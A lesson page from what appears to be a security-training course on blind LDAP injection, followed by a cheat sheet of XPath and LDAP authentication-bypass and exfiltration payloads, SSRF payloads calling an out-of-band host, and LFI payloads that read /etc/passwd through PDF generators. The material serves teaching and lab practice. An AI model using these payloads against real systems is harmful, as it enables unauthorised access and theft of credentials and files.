Injection Attacks

LDAP - Data Exfiltration & Blind Exploitation

Now that we have discussed how to bypass authentication using LDAP injection in the previous section, we will focus on data exfiltration in this section. Even if the result of the LDAP search is not displayed to us, it is still possible to exfiltrate data with a methodology similar to the one used for blind SQL injections.

Just like with XPath injection, there is no sleep function in LDAP so we need an indicator by the web application that informs us whether the query returns any results or not. This leaks a bit of information to us, which allows us to exfiltrate data without it being displayed.

Data Exfiltration

In a scenario where the web application displays results to us, data exfiltration is simple since we can inject a wildcard to match all entries with the specified attribute. Consider a search filter like the following, where we can supply the username in the uid attribute:

(&(uid=admin)(objectClass=account))

If we simply supply a wildcard character as a username, the web application will display details about all accounts since the search filter becomes the following:

(&(uid=*)(objectClass=account))

We can achieve the same effect if we can inject a payload into an or clause of a search filter. Consider a search filter like this:

(|(objectClass=organization)(objectClass=device))

This search filter matches all organization and device entries. If our payload is injected into the second objectClass attribute, we can force the backend to leak all entries by injecting a wildcard such that the search filter looks like this:

(|(objectClass=organization)(objectClass=*))

Thus, data exfiltration is straightforward provided the web application displays the results of the search filter to us.

Blind Exploitation

Now let's discuss the more advanced and realistic cases of blind exploitation of LDAP injection vulnerabilities. When starting the lab below, we can see a slightly modified version of the lab from the previous section. When we attempt to log in, the administrator seems to have been notified about the LDAP injection from the previous section, so the site is in maintenance mode:

However, the web application responds differently, if we provide invalid credentials:

We can exploit this difference in the response to exfiltrate data from the directory server. Remember that the search filter used for authentication looks similar to the following:

(&(uid=htb-stdnt)(password=p@ssw0rd))

We can verify that the web application is still vulnerable to LDAP injection by providing a wildcard as the password:

We can now brute-force the password character-by-character by injecting substring search filters. We can start with the first character by setting the password to a*, resulting in the following search filter:

(&(uid=htb-stdnt)(password=a*))

This search filter will return data if the user's password starts with an a, otherwise, it does not. We can observe the web application to determine whether the login was successful or not. In our case, it is unsuccessful:

We now have to loop through the entire alphabet (including digits and special characters) to determine the first character of the password. In our case, it is p:

Now we can brute-force the second character, by altering the search filter to look like this:

(&(uid=htb-stdnt)(password=p@*))

In our case, the second character is an @:

Now we have to repeat this process iteratively until no more characters are found, meaning we exfiltrated the entire password:

Furthermore, it is also possible to exfiltrate data from different attributes. As an example, we will target the description attribute of our user. If we submit a username of htb-stdnt)(|(description=* and a password of invalid), the resulting search filter looks like this:

(&(uid=htb-stdnt)(|(description=*)(password=invalid)))

Since the provided password is incorrect, our injected or clause only returns true if the condition for the description attribute is true. This now allows us to apply the same methodology as discussed above to brute-force the description attribute character-by-character:

Note: Most LDAP attributes are case-insensitive. So if we need the correct casing, for instance for passwords, we might have to brute-force it.

We can target and exfiltrate any attribute of our specified user. Furthermore, we can even determine which attributes exist in our entry by specifying a wildcard. For valid attributes, the web application responds positively:

However, the web application responds negatively for invalid attributes:

Note: Similar to the exploitation of blind XPath injection, it is recommended to write a script to exfiltrate the data for us.

/ 1 spawns left

Waiting to start...

Questions

Answer the question(s) below to complete this Section and earn cubes!

Target: Click here to spawn the target system!

Authenticate to with user "htb-stdnt" and password "Academy_student!"

+ 7 Try to use what you learned in this section to exfiltrate the description attribute of the admin user.

+10 Streak pts

Previous Next

Go to Questions

Introduction to Injection Attacks

Skills Assessment

My Workstation

OFFLINE

/ 1 spawns left

Cheat Sheet

The cheat sheet is a useful command reference for this module.

XPath Injection

XPath Syntax

Nodes:

Query	Explanation
`module`	Select all `module` child nodes of the context node
`/`	Select the document root node
`//`	Select descendant nodes of the context node
`.`	Select the context node
`..`	Select the parent node of the context node
`@difficulty`	Select the `difficulty` attribute node of the context node
`text()`	Select all text node child nodes of the context node

Predicates:

Query	Explanation
`/academy_modules/module[1]`	Select the first `module` child node of the `academy_modules` node
`/academy_modules/module[position()=1]`	Equivalent to the above query
`/academy_modules/module[last()]`	Select the last `module` child node of the `academy_modules` node
`/academy_modules/module[position()<3]`	Select the first two `module` child nodes of the `academy_modules` node
`//module[tier=2]/title/text()`	Select the `title` of all modules where the `tier` element node equals `2`
`//module/author[@co-author]/../title`	Select the `title` of all modules where the `author` element node has a `co-author` attribute node
`//module/tier[@difficulty="medium"]/..`	Select all modules where the `tier` element node has a `difficulty` attribute node set to `medium`

Predicate Operands:

Operand	Explanation
`+`	Addition
`-`	Subtraction
`*`	Multiplication
`div`	Division
`=`	Equal
`!=`	Not Equal
`<`	Less than
`<=`	Less than or Equal
`>`	Greater than
`>=`	Greater than or Equal
`or`	Logical Or
`and`	Logical And
`mod`	Modulus

Wildcards:

Query	Explanation
`node()`	Matches any node
`*`	Matches any `element` node
`@*`	Matches any `attribute` node

Union:

Query	Explanation
`//module[tier=2]/title/text() \| //module[tier=3]/title/text()`	Select the title of all modules in tiers `2` and `3`

Authentication Bypass

Description	Username	Query
Regular Authentication	`htb-stdnt`	`/users/user[username/text()='htb-stdnt' and password/text()='295362c2618a05ba3899904a6a3f5bc0']`
Bypass Authentication with known username	`admin' or '1'='1`	`/users/user[username/text()='admin' or '1'='1' and password/text()='21232f297a57a5a743894a0e4a801fc3']`
Bypass Authentication by position	`' or position()=1 or '`	`/users/user[username/text()='' or position()=1 or '' and password/text()='21232f297a57a5a743894a0e4a801fc3']`
Bypass Authentication by substring	`' or contains(.,'admin') or '`	`/users/user[username/text()='' or contains(.,'admin') or '' and password/text()='21232f297a57a5a743894a0e4a801fc3']`

Data Exfiltration

Unrestricted:

Leak entire XML document via union injection: | //text()

Restricted:

Determine schema depth via chain of wildcards /*[1]
iterate through XML schema by increasing the indices to exfiltrate the entire document step-by-step

Blind Data Exfiltration

Description	Payload	Query
Exfiltrating Node Name's Length	`invalid' or string-length(name(/*[1]))=1 and '1'='1`	`/users/user[username='invalid' or string-length(name(/*[1]))=1 and '1'='1']`
Exfiltrating Node Name	`invalid' or substring(name(/*[1]),1,1)='a' and '1'='1`	`/users/user[username='invalid' or substring(name(/*[1]),1,1)='a' and '1'='1']`
Exfiltrating Number of Child Nodes	`invalid' or count(/[1]/)=1 and '1'='1`	`/users/user[username='invalid' or count(/[1]/)=1 and '1'='1']`
Exfiltrating Value Length	`invalid' or string-length(/users/user[1]/username)=1 and '1'='1`	`/users/user[username='invalid' or string-length(/users/user[1]/username)=1 and '1'='1']`
Exfiltrating Value	`invalid' or substring(/users/user[1]/username,1,1)='a' and '1'='1`	`/users/user[username='invalid' or substring(/users/user[1]/username,1,1)='a' and '1'='1']`

Time-based

Force the web application to iterate over the entire XML document exponentially:

count((//.)[count((//.))])

Determine whether the first letter of the "username" is "a" based on the time it takes: if it is, the query will utilize a significant processing time, otherwise, it won't.

invalid' or substring(/users/user[1]/username,1,1)='a' and count((//.)[count((//.))]) and '1'='1

LDAP Injection

LDAP Search Filter Syntax

Name	Operand	Example	Example Description
Equality	`=`	`(name=Kaylie)`	Matches all entries that contain a `name` attribute with the value `Kaylie`
Greater-Or-Equal	`>=`	`(uid>=10)`	Matches all entries that contain a `uid` attribute with a value greater-or-equal to `10`
Less-Or-Equal	`<=`	`(uid<=10)`	Matches all entries that contain a `uid` attribute with a value less-or-equal to `10`
Approximate Match	`~=`	`(name~=Kaylie)`	Matches all entries that contain a `name` attribute with approximately the value `Kaylie`
And	`(&()())`	`(&(name=Kaylie)(title=Manager))`	Matches all entries that contain a `name` attribute with the value `Kaylie` and a `title` attribute with the value `Manager`
Or	`(\|()())`	`(\|(name=Kaylie)(title=Manager))`	Matches all entries that contain a `name` attribute with the value `Kaylie` or a `title` attribute with the value `Manager`
Not	`(!())`	`(!(name=Kaylie))`	Matches all entries that contain a `name` attribute with a value different from `Kaylie`
True	`(&)`	`(&)`	Universal True
False	`(\|)`	`(\|)`	Universal False
Wildcard	`*`	`(name=a)`	Matches all entries that contain a name attribute that contains an `a`

Authentication Bypass

Description	Username	Password	Search Filter
Regular Authentication	`admin`	`admin`	`(&(uid=admin)(userPassword=admin))`
Wildcard Bypass	`*`	`*`	`(&(uid=)(userPassword=))`
Wildcard Bypass targeting specific user	`admin*`	`*`	`(&(uid=admin)(userPassword=))`
Universal True Bypass	`admin)(\|(&`	`invalid)`	`(&(uid=admin)(\|(&)(userPassword=invalid)))`

Data Exfiltration

Brute-Force data character-by-character:

Username	Password	Query
`htb-stdnt`	`*`	`(&(uid=htb-stdnt)(userPassword=*))`
`htb-stdnt`	`p*`	`(&(uid=htb-stdnt)(userPassword=p*))`
`htb-stdnt`	`p@*`	`(&(uid=htb-stdnt)(userPassword=p@*))`
`htb-stdnt`	`p@s*`	`(&(uid=htb-stdnt)(userPassword=p@s*))`
`htb-stdnt`	`p@ss*`	`(&(uid=htb-stdnt)(userPassword=p@ss*))`
`htb-stdnt`	`p@ssw*`	`(&(uid=htb-stdnt)(userPassword=p@ssw*))`
`htb-stdnt`	`p@ssw0*`	`(&(uid=htb-stdnt)(userPassword=p@ssw0*))`
`htb-stdnt`	`p@ssw0r*`	`(&(uid=htb-stdnt)(userPassword=p@ssw0r*))`
`htb-stdnt`	`p@ssw0rd*`	`(&(uid=htb-stdnt)(userPassword=p@ssw0rd*))`
`htb-stdnt`	`p@ssw0rd`	`(&(uid=htb-stdnt)(userPassword=p@ssw0rd))`

PDF Generation Vulnerabilities

Determining the PDF Generation Library

$ exiftool invoice.pdf 
<SNIP>
Creator                         : wkhtmltopdf 0.12.6.1
Producer                        : Qt 4.8.7
<SNIP>

Server-Side Request Forgery (SSRF) Payloads

<img src="http://cf8kzfn2vtc0000n9fbgg8wj9zhyyyyyb.oast.fun/ssrftest1"/>
<link rel="stylesheet" href="http://cf8kzfn2vtc0000n9fbgg8wj9zhyyyyyb.oast.fun/ssrftest2">
<iframe src="http://cf8kzfn2vtc0000n9fbgg8wj9zhyyyyyb.oast.fun/ssrftest3"></iframe>

Local File Inclusion (LFI) Payloads

<script>
	x = new XMLHttpRequest();
	x.onload = function(){
		document.write(this.responseText)
	};
	x.open("GET", "file:///etc/passwd");
	x.send();
</script>

<iframe src="file:///etc/passwd" width="800" height="500"></iframe>
<object data="file:///etc/passwd" width="800" height="500">
<portal src="file:///etc/passwd" width="800" height="500">

<annotation file="/etc/passwd" content="/etc/passwd" icon="Graph" title="LFI" />

Injection Attacks

LDAP - Data Exfiltration & Blind Exploitation

Data Exfiltration

Blind Exploitation

Questions

Table of Contents

Introduction to Injection Attacks

XPath Injection

LDAP Injection

HTML Injection in PDF Generators

Skills Assessment

My Workstation